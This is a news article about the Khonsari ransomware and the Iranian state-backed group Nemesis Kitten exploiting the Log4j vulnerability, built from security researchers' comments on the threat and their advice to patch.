Khonsari ransomware, Nemesis Kitten are exploiting Log4j vulnerability

Security researchers are discovering that attacks are evolving beyond crypto-miners.
Written by Jonathan Greig, Contributor

Security researchers have found evidence that state-sponsored groups, as well as the group behind the Khonsari ransomware family, are all exploiting the Log4j vulnerability. 

In a report on Monday, Bitdefender's Martin Zugec wrote that he saw attacks on Sunday against systems running the Windows operating system. These attacks were attempting to deploy Khonsari.

Zugec told ZDNet that Khonsari is relatively new ransomware and is considered basic -- compared to the sophistication of professional ransomware-as-a-service groups. 

"Most likely, it is a threat actor experimenting with this new attack vector. However, that doesn't mean that more advanced actors are not looking at exploiting the Log4j vulnerability; they most assuredly are," Zugec explained. "Instead of looking for the shortest route to monetization, they will use this window of opportunity to gain access to the networks and start preparing for a full-scale larger attack."

"If you haven't patched already, you may already have uninvited, dormant guests in your network," Zugec added.

Cado Security released its own report on the ransomware, noting that Khonsari "weighs in at only 12KB and contains only the most basic functionality required to perform its ransomware objective." 

"Its size and simplicity is also a strength, however; at the time we ran the malware dynamically, it wasn't detected by the system's built-in antivirus," Cado's Matt Muir explained. 

Cado Security CTO Chris Doman said the distribution of Khonsari was limited, and the server that originally delivered the ransomware is now serving a more generic backdoor.

"As others have noted, the contact information in the ransomware note are likely to be fake, and possibly even a false flag. Microsoft has reported that they have seen CobaltStrike delivered -- a backdoor favored by targeted ransomware gangs. And Sekoia have said that the LockBit ransomware crew are likely looking to exploit the vulnerability too," Doman said. 

Ransomware expert Brett Callow called Khonsari "skid-level ransomware" but noted that it's safe to assume other actors attempting to exploit this vulnerability will be more advanced

"Not all will be ransomware gangs. Threat actors of all stripes are attempting to find ways to use Log4j to their advantage," Callow said. 

McAfee Enterprise and FireEye Chief Scientist Raj Samani told ZDNet that most of the payloads attacking Log4j are predominantly nuisances. But the ease with which Khonsari can be deployed -- and the prevalence of vulnerable systems -- means payloads could become more destructive.

"We do expect unpatched systems to continue to be exploited with a high likelihood of ransomware as a malicious payload," said McAfee Enterprise and FireEye head of advanced threat research Steve Povolny.  

Web servers are the most common systems under attack right now because they're easy to exploit and have a good return on investment, said ESET's Marc-Étienne Léveillé. He added that in the next few weeks, "we'll probably discover other software using Log4j that's vulnerable."

Security researchers are already seeing more sophisticated groups exploiting the vulnerability. Adam Meyers, SVP of intelligence at CrowdStrike, said his team observed Iran-based, state-sponsored actor Nemesis kitten deploy a class file into a server that could be triggered by Log4J. 

"CrowdStrike has previously observed Nemesis Kitten attempt both disruptive and destructive attacks," Meyers added.

Sophos senior threat researcher Sean Gallagher explained that so far, Log4Shell attackers have been focused on cryptomining, calling this the "lull before the storm."

"We expect adversaries are likely grabbing as much access to whatever they can get right now... to monetize and/or capitalize on it later on," Gallagher said. "The most immediate priority for defenders is to reduce exposure by patching and mitigating all corners of their infrastructure and investigate exposed and potentially compromised systems."

He added, "This vulnerability can be everywhere."

Editorial standards